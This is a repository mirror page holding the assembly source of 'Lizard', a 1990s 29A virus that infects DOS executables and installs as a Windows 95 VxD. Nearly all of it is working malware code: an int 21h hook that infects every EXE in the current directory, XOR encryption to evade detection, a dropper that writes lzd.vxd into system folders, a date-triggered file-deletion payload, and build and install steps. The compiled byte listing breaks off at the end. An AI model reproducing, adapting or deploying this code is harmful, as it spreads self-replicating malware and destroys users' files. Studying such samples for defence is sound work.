mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
4b9382ddbc
push
626 lines
14 KiB
NASM
626 lines
14 KiB
NASM
;-----------------------------------------------------------------------------
|
||
;Lizard by Reptile/29A (another version ;)
|
||
;-----------------------------------------------------------------------------
|
||
|
||
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
|
||
; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
|
||
; ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
|
||
; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
|
||
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
|
||
|
||
;This is an encrypted vxd direct action dos exe infector (I added some anti-
|
||
;heuristics and other stuff and optimized the code of v1.0).
|
||
|
||
;When an infected file is run the virus decrypts itself, drops lzd.vxd to the
|
||
;available one of the three dirs and then returns back to the host. After the
|
||
;next reboot...
|
||
|
||
;When windoze 95 is starting, it loads the vxd (lzd.vxd) automatically coz
|
||
;it's in the '\iosubsys\' dir (Lizard doesn't need to modify the system.ini
|
||
;or the registry). Then the virus takes control and hooks the V86 interrupt
|
||
;chain. It executes on exec (4bh), create (3ch), ext. open (6ch), close (3eh)
|
||
;and on find first file (4eh) using direct action techniques to infect all
|
||
;dos exes in the current directory (*highly* infectious!). Lzd.vxd has a size
|
||
;of 7099 bytes (masm sux! :P ), but the victims are only increased by 1967 (!)
|
||
;bytes.
|
||
|
||
;Findvirus v7.75, AVP v3.0 and TBAV v8.03 (high heuristic sensitivity!) can't
|
||
;detect it (all for win95).
|
||
|
||
;Compiling lzd.vxd (win95 DDK):
|
||
;makefile
|
||
|
||
;Compiling rmlzd.inc:
|
||
;tasm /m2 rmlzd.asm
|
||
;tlink /t rmlzd.obj
|
||
;file2db rmlzd.com (or another db generator)
|
||
;modify rmlzd.dat
|
||
|
||
;To install copy lzd.vxd to one of the following dirs:
|
||
;- c:\windows\system\iosubsys
|
||
;- c:\win95\system\iosubsys
|
||
;- c:\windows.000\system\iosubsys
|
||
;...or start lizard.exe :)
|
||
|
||
;P.S.:
|
||
;Sandy: are u lucky now? ;)
|
||
;Jacky: thanx for testing it!
|
||
;GriYo: the stack stuff really didn't work :P
|
||
|
||
;P.P.S:
|
||
;TrY MaGiC MuShRoOmS...
|
||
|
||
;---[LZD.ASM]-----------------------------------------------------------------
|
||
|
||
.386p
|
||
|
||
.xlist
|
||
include vmm.inc
|
||
.list
|
||
|
||
vxdhsize equ 701
|
||
vxddsize equ 81
|
||
vxdcsize equ 880
|
||
esize equ encend - encstart
|
||
vsize equ vend - start
|
||
|
||
Declare_Virtual_Device LZD, 6, 66, LZD_Control, Undefined_Device_Id, \
|
||
Undefined_Init_Order,,
|
||
|
||
VxD_Locked_Data_Seg
|
||
wcard db '*.e?e',0 ;*.l?z
|
||
include rmlzd.inc ;realmode code
|
||
dflag db 0
|
||
pflag db 0
|
||
ndta db 43 dup (?)
|
||
header db 26 dup (?)
|
||
VxD_Locked_Data_Ends
|
||
;-----------------------------------------------------------------------------
|
||
VxD_Locked_Code_Seg
|
||
BeginProc LZD_Device_Init
|
||
;trigger
|
||
mov ah,2ah ;get date
|
||
vxdint 21h
|
||
;live drazil si
|
||
cmp dh,10 ;26.10.?
|
||
jne npload
|
||
cmp dl,26
|
||
jne npload
|
||
|
||
mov pflag,1 ;hehe
|
||
|
||
npload:
|
||
mov eax,21h ;install int 21h handler
|
||
mov esi,offset32 int21h
|
||
VMMcall Hook_V86_Int_Chain
|
||
clc
|
||
ret
|
||
EndProc LZD_Device_Init
|
||
;-----------------------------------------------------------------------------
|
||
BeginProc int21h
|
||
cmp [ebp.Client_AH],4bh ;exec
|
||
je short ww
|
||
cmp [ebp.Client_AH],3ch ;create
|
||
je short ww
|
||
cmp [ebp.Client_AH],6ch ;ext. open
|
||
je short ww
|
||
cmp [ebp.Client_AH],3eh ;close
|
||
je short ww
|
||
cmp [ebp.Client_AH],4eh ;find first
|
||
je short ww
|
||
jmp prevhook
|
||
|
||
ww:
|
||
Push_Client_State ;save regs
|
||
VMMcall Begin_Nest_Exec
|
||
;-----------------------------------------------------------------------------
|
||
cmp dflag,1
|
||
je done
|
||
mov ax,3d02h ;open lzd.vxd
|
||
lea edx,dropname1 ;in the 'c:\windows\system\iosubsys' dir
|
||
vxdint 21h
|
||
jnc short rd
|
||
|
||
mov ax,3d02h ;open the vxd
|
||
lea edx,dropname2 ;in the 'c:\win95\system\iosubsys' dir
|
||
vxdint 21h
|
||
jnc short rd
|
||
|
||
mov ax,3d02h ;open the vxd
|
||
lea edx,dropname3 ;in the 'c:\windows.000\system\iosubsys' dir
|
||
vxdint 21h
|
||
jc ecsit ;skip it
|
||
|
||
rd:
|
||
xchg ax,bx
|
||
|
||
mov ah,3fh ;store the header of the vxd
|
||
mov cx,vxdhsize
|
||
lea edx,vxdheader
|
||
vxdint 21h
|
||
|
||
mov ax,4201h ;jmp over zeros
|
||
xor cx,cx
|
||
mov dx,3400
|
||
vxdint 21h
|
||
|
||
mov ah,3fh ;store the vxddata
|
||
mov cx,vxddsize
|
||
lea edx,vxddata
|
||
vxdint 21h
|
||
|
||
mov ax,4201h ;jmp over realmodecode and zeros
|
||
xor cx,cx
|
||
mov dx,2037
|
||
vxdint 21h
|
||
|
||
mov ah,3fh ;store the vxdcode
|
||
mov cx,vxdcsize
|
||
lea edx,vxdcode
|
||
vxdint 21h
|
||
|
||
mov ah,3eh ;close...
|
||
vxdint 21h
|
||
|
||
mov dflag,1 ;set flag
|
||
;-----------------------------------------------------------------------------
|
||
done:
|
||
mov ah,1ah ;set dta
|
||
lea edx,ndta
|
||
vxdint 21h
|
||
|
||
ffirst:
|
||
mov ah,4eh ;search for first exe
|
||
jmp short w
|
||
fnext:
|
||
mov ah,4fh ;find next exe
|
||
w:
|
||
mov cx,7
|
||
lea edx,wcard ;*.e?e
|
||
vxdint 21h
|
||
jc ecsit
|
||
|
||
mov ax,4301h ;set normal attribute
|
||
mov cx,20h
|
||
lea edx,[ndta + 30]
|
||
vxdint 21h
|
||
|
||
cmp pflag,1 ;sux0ring microsuckers
|
||
jne pheeew ;(the payload in v1.0 was a bit too destructive ;)
|
||
|
||
evil:
|
||
;evil payload against the imperialism of microsoft!
|
||
mov ah,41h ;yhcrana
|
||
lea edx,[ndta + 30]
|
||
vxdint 21h
|
||
jmp ecsit
|
||
|
||
pheeew:
|
||
mov ax,3d02h ;open the victim
|
||
lea edx,[ndta + 30]
|
||
vxdint 21h
|
||
jc fnext
|
||
xchg ax,bx
|
||
|
||
mov ah,3fh ;read header
|
||
mov cx,26
|
||
lea edx,header
|
||
vxdint 21h
|
||
|
||
cmp word ptr [header],'ZM' ;exe?
|
||
jne cfile
|
||
cmp word ptr [header + 0ch],0ffffh ;allocate all mem?
|
||
jne cfile
|
||
cmp word ptr [header + 18h],40h ;win exe?
|
||
je cfile
|
||
mov al,[header + 12h] ;infected?
|
||
or al,al
|
||
jne cfile
|
||
|
||
;save ss:sp
|
||
mov ax,word ptr [header + 0eh]
|
||
mov sseg,ax
|
||
mov ax,word ptr [header + 10h]
|
||
mov ssp,ax
|
||
|
||
;save cs:ip
|
||
mov eax,dword ptr [header + 14h]
|
||
mov csip,eax
|
||
|
||
mov ax,4202h ;eof
|
||
xor cx,cx
|
||
cwd
|
||
vxdint 21h
|
||
|
||
;calc new cs:ip
|
||
mov cx,16
|
||
div cx
|
||
sub ax,word ptr [header + 8]
|
||
|
||
mov word ptr [header + 14h],dx
|
||
mov word ptr [header + 16h],ax
|
||
|
||
add edx,vend ;calc stack
|
||
|
||
mov word ptr [header + 0eh],ax
|
||
mov word ptr [header + 10h],dx
|
||
|
||
;xor encryption
|
||
rdnm:
|
||
in al,40h
|
||
or al,al
|
||
je rdnm
|
||
mov [encval],al ;save random value
|
||
|
||
mov edi,offset32 encstart
|
||
mov cx,esize
|
||
xl:
|
||
xor [edi],al
|
||
inc edi
|
||
loop xl
|
||
|
||
;write virus
|
||
mov ah,40h
|
||
mov cx,vsize
|
||
mov edx,offset32 start
|
||
vxdint 21h
|
||
|
||
;undo
|
||
mov al,[encval]
|
||
mov edi,offset32 encstart
|
||
mov cx,esize
|
||
|
||
xll:
|
||
xor [edi],al
|
||
inc edi
|
||
loop xll
|
||
|
||
mov ax,4202h ;eof
|
||
xor cx,cx
|
||
cwd
|
||
vxdint 21h
|
||
|
||
mov cx,512 ;calc pages
|
||
div cx
|
||
or dx,dx
|
||
jz short np
|
||
inc ax
|
||
np:
|
||
mov word ptr [header + 4],ax
|
||
mov word ptr [header + 2],dx
|
||
|
||
mov ax,4200h ;bof
|
||
xor cx,cx
|
||
cwd
|
||
vxdint 21h
|
||
|
||
rnd:
|
||
in al,40h ;set infection flag
|
||
or al,al
|
||
je rnd
|
||
mov [header + 12h],al
|
||
|
||
mov ah,40h ;write new header
|
||
mov cx,26
|
||
lea edx,header
|
||
vxdint 21h
|
||
|
||
cfile:
|
||
mov cl,byte ptr [ndta + 21] ;restore attribute
|
||
lea edx,[ndta + 1eh]
|
||
mov ax,4301h
|
||
vxdint 21h
|
||
|
||
mov cx,word ptr [ndta + 22] ;restore time/date
|
||
mov dx,word ptr [ndta + 24]
|
||
mov ax,5701
|
||
vxdint 21h
|
||
|
||
mov ah,3eh ;close file
|
||
vxdint 21h
|
||
jmp fnext
|
||
|
||
ecsit:
|
||
VMMcall End_Nest_Exec
|
||
Pop_Client_State
|
||
|
||
prevhook:
|
||
stc
|
||
ret
|
||
EndProc int21h
|
||
;-----------------------------------------------------------------------------
|
||
BeginProc LZD_Control
|
||
Control_Dispatch Init_Complete,LZD_Device_Init
|
||
clc
|
||
ret
|
||
EndProc LZD_Control
|
||
wb db 13,10,'Lizard by Reptile/29A',0
|
||
VxD_Locked_Code_Ends
|
||
End ;this is the end my only friend the end...
|
||
|
||
;---[RMLZD.ASM]---------------------------------------------------------------
|
||
|
||
;Lizard's real mode portion
|
||
|
||
.286
|
||
|
||
vxdhsize equ 701
|
||
vxddsize equ 81
|
||
vxdcsize equ 880
|
||
esize equ encend - encstart
|
||
rmsize equ rmend - rmstart
|
||
|
||
.model tiny
|
||
|
||
.code
|
||
org 100h
|
||
start:
|
||
rmstart:
|
||
;get delta
|
||
;-----------------------------------------------------------------------------
|
||
call $ + 3
|
||
drazil:
|
||
pop si
|
||
sub si,offset drazil
|
||
push si
|
||
pop bp
|
||
;-----------------------------------------------------------------------------
|
||
push ds ;coz psp
|
||
|
||
push cs
|
||
pop ds
|
||
|
||
;decrypt it
|
||
db 176 ;mov al
|
||
encval db 0
|
||
;-----------------------------------------------------------------------------
|
||
lea di,[bp + offset encstart]
|
||
mov cx,esize
|
||
xd:
|
||
jmp fj
|
||
fj2:
|
||
inc di
|
||
loop xd
|
||
jmp encstart
|
||
fj:
|
||
xor [di],al
|
||
jmp fj2
|
||
;-----------------------------------------------------------------------------
|
||
encstart:
|
||
mov ax,3d00h ;try to open lzd.vxd in
|
||
lea dx,[bp + offset dropname1] ;c:\windows\system\iosubsys
|
||
int 21h
|
||
jnc cfile ;exit if already installed
|
||
mov ah,3ch ;install lzd.vxd
|
||
xor cx,cx
|
||
int 21h
|
||
jnc inst
|
||
|
||
mov ax,3d00h ;try to open lzd.vxd in
|
||
lea dx,[bp + offset dropname2] ;c:\win95\system\iosubsys
|
||
int 21h
|
||
jnc cfile
|
||
mov ah,3ch
|
||
xor cx,cx
|
||
int 21h
|
||
jnc inst
|
||
|
||
mov ax,3d00h ;try to open lzd.vxd in
|
||
lea dx,[bp + offset dropname3] ;c:\windows.000\system\iosubsys
|
||
int 21h
|
||
jnc cfile
|
||
mov ah,3ch
|
||
xor cx,cx
|
||
int 21h
|
||
jc exit
|
||
|
||
inst:
|
||
xchg ax,bx
|
||
|
||
mov ah,40h ;write the header
|
||
mov cx,vxdhsize
|
||
lea dx,[bp + offset vxdheader]
|
||
int 21h
|
||
|
||
;write some zeros
|
||
mov cx,3400
|
||
lzero:
|
||
push cx
|
||
mov ah,40h
|
||
mov cx,1
|
||
lea dx,[bp + zero]
|
||
int 21h
|
||
pop cx
|
||
loop lzero
|
||
|
||
mov ah,40h ;write the data
|
||
mov cx,vxddsize
|
||
lea dx,[bp + offset vxddata]
|
||
int 21h
|
||
|
||
mov ah,40h ;write the rmcode
|
||
mov cx,rmsize
|
||
lea dx,[bp + offset rmstart]
|
||
int 21h
|
||
|
||
;write some more zeros
|
||
mov cx,1732
|
||
lzero2:
|
||
push cx
|
||
mov ah,40h
|
||
mov cx,1
|
||
lea dx,[bp + zero]
|
||
int 21h
|
||
pop cx
|
||
loop lzero2
|
||
|
||
mov ah,40h ;write the code
|
||
mov cx,vxdcsize
|
||
lea dx,[bp + offset vxdcode]
|
||
int 21h
|
||
|
||
cfile:
|
||
mov ah,3eh
|
||
int 21h
|
||
|
||
;exe return
|
||
exit:
|
||
pop ax ;psp
|
||
add ax,11h
|
||
dec ax
|
||
add word ptr [bp + offset csip + 2],ax
|
||
|
||
;stack
|
||
db 5 ;add ax
|
||
sseg dw 0fff0h ;test
|
||
mov ss,ax
|
||
|
||
db 0bch ;mov sp
|
||
ssp dw 0fffeh
|
||
|
||
db 0eah
|
||
csip dd 0fff00000h
|
||
|
||
zero db 0
|
||
|
||
dropname1 db 'c:\windows\system\iosubsys\lzd.vxd',0
|
||
dropname2 db 'c:\win95\system\iosubsys\lzd.vxd',0
|
||
dropname3 db 'c:\windows.000\system\iosubsys\lzd.vxd',0
|
||
rmend:
|
||
vxdheader db vxdhsize dup (?)
|
||
vxddata db vxddsize dup (?)
|
||
vxdcode db vxdcsize dup (?)
|
||
encend:
|
||
ends
|
||
end start
|
||
|
||
;---[RMLZD.INC]---------------------------------------------------------------
|
||
|
||
;Modified db listing of rmlzd.com
|
||
|
||
start:
|
||
db 0E8h, 000h, 000h, 05Eh, 081h, 0EEh, 003h, 001h
|
||
db 056h, 05Dh, 01Eh, 00Eh, 01Fh, 0B0h
|
||
;db 000h
|
||
encval db 0
|
||
db 08Dh
|
||
db 0BEh, 021h, 001h, 0B9h, 08Eh, 007h, 0EBh, 005h
|
||
db 047h, 0E2h, 0FBh, 0EBh, 004h, 030h, 005h, 0EBh
|
||
db 0F7h
|
||
encstart:
|
||
db 0B8h, 000h, 03Dh, 08Dh, 096h, 0C6h, 001h
|
||
db 0CDh, 021h, 073h, 07Fh, 0B4h, 03Ch, 033h, 0C9h
|
||
db 0CDh, 021h, 073h, 026h, 0B8h, 000h, 03Dh, 08Dh
|
||
db 096h, 0E9h, 001h, 0CDh, 021h, 073h, 06Ch, 0B4h
|
||
db 03Ch, 033h, 0C9h, 0CDh, 021h, 073h, 013h, 0B8h
|
||
db 000h, 03Dh, 08Dh, 096h, 00Ah, 002h, 0CDh, 021h
|
||
db 073h, 059h, 0B4h, 03Ch, 033h, 0C9h, 0CDh, 021h
|
||
db 072h, 055h, 093h, 0B4h, 040h, 0B9h, 0BDh, 002h
|
||
db 08Dh, 096h, 031h, 002h, 0CDh, 021h, 0B9h, 048h
|
||
db 00Dh, 051h, 0B4h, 040h, 0B9h, 001h, 000h, 08Dh
|
||
db 096h, 0C5h, 001h, 0CDh, 021h, 059h, 0E2h, 0F1h
|
||
db 0B4h, 040h, 0B9h, 051h, 000h, 08Dh, 096h, 0EEh
|
||
db 004h, 0CDh, 021h, 0B4h, 040h, 0B9h, 031h, 001h
|
||
db 08Dh, 096h, 000h, 001h, 0CDh, 021h, 0B9h, 0C4h
|
||
db 006h, 051h, 0B4h, 040h, 0B9h, 001h, 000h, 08Dh
|
||
db 096h, 0C5h, 001h, 0CDh, 021h, 059h, 0E2h, 0F1h
|
||
db 0B4h, 040h, 0B9h, 070h, 003h, 08Dh, 096h, 03Fh
|
||
db 005h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h, 058h
|
||
db 005h, 011h, 000h, 048h, 001h, 086h, 0C3h, 001h
|
||
db |